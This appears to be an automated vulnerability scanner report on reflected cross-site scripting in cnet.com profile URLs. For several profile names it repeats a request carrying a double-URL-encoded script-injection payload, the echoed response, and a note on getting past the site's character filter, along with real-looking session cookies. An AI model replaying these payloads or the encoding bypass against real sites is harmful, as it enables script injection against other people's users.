GET /profile/Dan_Ackermanb8a4d%253cscript%253ealert%25281%2529%253c%252fscript%253e428bca84c78/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:11 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:11 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Length: 31050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Dan_Ackermanb8a4d<script>alert(1)</script>428bca84c78's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdf8049e6f2 was submitted in the REST URL parameter 2. This input was echoed as 64e20"><script>alert(1)</script>cdf8049e6f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Dan_Ackerman64e20%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecdf8049e6f2/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:10 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:10 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=991 Connection: Keep-Alive Content-Length: 31228
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Dan_Ackerman64e20"><script>alert(1)</script>cdf8049e6f2"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7611%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4bb07ea02a5 was submitted in the REST URL parameter 2. This input was echoed as c7611"><script>alert(1)</script>4bb07ea02a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Daniel+Terdimanc7611%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4bb07ea02a5/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:19 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:19 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=882 Connection: Keep-Alive Content-Length: 31216
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Daniel Terdimanc7611"><script>alert(1)</script>4bb07ea02a5"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3097f%253cscript%253ealert%25281%2529%253c%252fscript%253e740aa84c9a3 was submitted in the REST URL parameter 2. This input was echoed as 3097f<script>alert(1)</script>740aa84c9a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Daniel+Terdiman3097f%253cscript%253ealert%25281%2529%253c%252fscript%253e740aa84c9a3/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:20 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:20 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=930 Connection: Keep-Alive Content-Length: 31114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Daniel Terdiman3097f<script>alert(1)</script>740aa84c9a3's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5add%253cscript%253ealert%25281%2529%253c%252fscript%253e37d56e43f5 was submitted in the REST URL parameter 2. This input was echoed as c5add<script>alert(1)</script>37d56e43f5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Gadget70c5add%253cscript%253ealert%25281%2529%253c%252fscript%253e37d56e43f5/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:50 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:50 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=983 Connection: Keep-Alive Content-Length: 31005
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Gadget70c5add<script>alert(1)</script>37d56e43f5's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df0a0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1f2218babc was submitted in the REST URL parameter 2. This input was echoed as df0a0"><script>alert(1)</script>c1f2218babc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Gadget70df0a0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1f2218babc/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:49 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:49 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=976 Connection: Keep-Alive Content-Length: 31057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Gadget70df0a0"><script>alert(1)</script>c1f2218babc"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 364e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9df162abdf1 was submitted in the REST URL parameter 2. This input was echoed as 364e2"><script>alert(1)</script>9df162abdf1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Ina+Fried364e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9df162abdf1/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:21 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:22 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=977 Connection: Keep-Alive Content-Length: 31107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Ina Fried364e2"><script>alert(1)</script>9df162abdf1"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae022%253cscript%253ealert%25281%2529%253c%252fscript%253e7e659d1ae29 was submitted in the REST URL parameter 2. This input was echoed as ae022<script>alert(1)</script>7e659d1ae29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Ina+Friedae022%253cscript%253ealert%25281%2529%253c%252fscript%253e7e659d1ae29/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:07:23 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:07:23 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=877 Connection: Keep-Alive Content-Length: 31034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Ina Friedae022<script>alert(1)</script>7e659d1ae29's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8b0d%253cscript%253ealert%25281%2529%253c%252fscript%253e113d1f8a06e was submitted in the REST URL parameter 2. This input was echoed as a8b0d<script>alert(1)</script>113d1f8a06e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/J-Doa8b0d%253cscript%253ealert%25281%2529%253c%252fscript%253e113d1f8a06e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:41 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:41 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=960 Connection: Keep-Alive Content-Length: 30982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>J-Doa8b0d<script>alert(1)</script>113d1f8a06e's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 957c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6e488cde22 was submitted in the REST URL parameter 2. This input was echoed as 957c9"><script>alert(1)</script>b6e488cde22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/J-Do957c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb6e488cde22/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:40 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:40 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=990 Connection: Keep-Alive Content-Length: 31057
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="J-Do957c9"><script>alert(1)</script>b6e488cde22"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc5df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb032ea72a6 was submitted in the REST URL parameter 2. This input was echoed as fc5df"><script>alert(1)</script>b032ea72a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/JJKaminskifc5df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb032ea72a6/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:20 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:20 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=995 Connection: Keep-Alive Content-Length: 31091
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="JJKaminskifc5df"><script>alert(1)</script>b032ea72a6"/> ...[SNIP]...
